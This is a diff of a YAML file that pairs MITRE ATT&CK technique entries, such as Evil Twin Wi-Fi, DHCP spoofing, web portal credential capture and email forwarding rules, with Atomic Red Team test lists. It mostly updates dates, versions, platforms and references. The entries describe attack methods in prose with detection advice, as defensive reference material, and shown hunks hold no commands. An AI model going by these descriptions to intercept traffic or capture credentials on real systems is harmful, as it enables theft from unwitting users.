+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40191,7 +40752,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40221,8 +40782,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40276,7 +40835,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40313,7 +40871,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40341,12 +40899,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40383,23 +40939,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40432,21 +40988,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40554,12 +41109,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40570,13 +41124,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40590,6 +41144,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40600,12 +41155,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40650,30 +41205,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -40683,31 +41219,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -40740,10 +41293,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40752,16 +41307,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -40793,9 +41349,6 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests:
     - name: Office365 - Email Forwarding
@@ -40848,63 +41401,62 @@ collection:
         elevation_required: false
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -40977,7 +41529,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -41032,12 +41583,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41049,6 +41599,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -41056,11 +41609,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41077,9 +41630,6 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests:
     - name: Office365 - Remote Mail Collected
@@ -41174,7 +41724,7 @@ collection:
         elevation_required: false
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -41190,6 +41740,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41198,13 +41749,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41212,15 +41763,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41231,9 +41778,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41279,7 +41877,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41298,37 +41896,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
